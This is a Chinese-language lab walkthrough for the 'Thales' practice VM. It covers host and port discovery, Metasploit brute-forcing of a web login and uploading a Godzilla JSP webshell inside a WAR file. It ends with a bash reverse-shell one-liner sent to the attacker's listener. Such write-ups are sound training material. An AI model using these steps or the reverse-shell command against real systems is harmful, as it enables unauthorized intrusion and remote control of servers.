当前位置: 首页 > news >正文

Thales靶机渗透攻略

news 来源:原创 2025/5/17 11:57:01

1.我们将靶机导入virtualbox,将连接方式切换为仅主机(host-only)

2.在kali虚拟机中将网卡设置为桥接模式,桥接至我们的virtualbox

3.开启靶机

4.在kali中扫描端口

arp-scan -l

扫描端口

nmap -o 192.168.56.101

发现开启了22和8080端口

5.我们访问网站的8080端口

6.发现有一个登录框

7.使用msf爆破一下

msfconsole

use 0

show options

set RHOSTS 192.168.56.101

run

这里我们扫描到了登录信息,并进行登录

8.登录后我们发现有一个上传war包的位置

9.首先我们使用哥斯拉生成一个jsp木马并保存到1.jsp,然后将1.jsp文件压缩为123.zip,修改后缀为war文件,上传

10.我们可以看到war包上传成功

11.我们访问一下生成的1.jsp文件

12.复制文件绝对路径,到哥斯拉中去连接

连接成功!

13.在kali中开启监听  nc -lvvp 8888

哥斯拉中执行反弹shell代码   /bin/bash -c 'bash -i >& /dev/tcp/192.168.56.102/8888 0>&1'

14.在kali中成功监听!!

相关文章:

  • 蓝桥杯备考----> Apple Catching G(线性DP)
  • 01LinePlot
  • 【蓝桥杯速成】| 12.回溯排列N皇后
  • leetcode day30 134+135+860
  • 深挖增长内核:好产品驱动增长的全方位解析
  • 深度解析:TOML、XML、YAML及其他配置/数据格式对比
  • 用YoloV8训练一个图片检测的模型,我接下来要做哪些事
  • 《深入Linux内核架构》读书笔记--第三章 内存管理
  • 【含文档+PPT+源码】基于Python的全国景区数据分析以及可视化实现
  • 【例3.5】位数问题(信息学奥赛一本通-1313)
  • BertTokenizer.from_pretrained的讲解和使用
  • golang编写UT:applyFunc和applyMethod区别
  • Oracle数据库服务器地址变更与监听配置修改完整指南
  • websocket结合promise的通信协议
  • 短期趋势动量策略思路
  • Thales靶机攻略
  • 鸿蒙移动应用开发--UI组件布局
  • 批量优化与压缩 PPT,减少 PPT 文件的大小
  • 【CSS3】01-初始CSS + 引入 + 选择器 + div盒子 + 字体修饰
  • Sar: 1靶场渗透
  • 外交部部长助理兼礼宾司司长洪磊接受美国新任驻华大使递交国书副本
  • 特朗普称即将与伊朗达成核协议,外交部:中方愿继续发挥建设性作用
  • 打击网络侵权盗版!四部门联合启动“剑网2025”专项行动
  • 通往国际舞台之路:清政府与万国公会的交往
  • 泽连斯基:正在等待俄方确认参加会谈的代表团组成
  • 7月纽约举办“上海日”,上海大剧院舞剧《白蛇》连演三场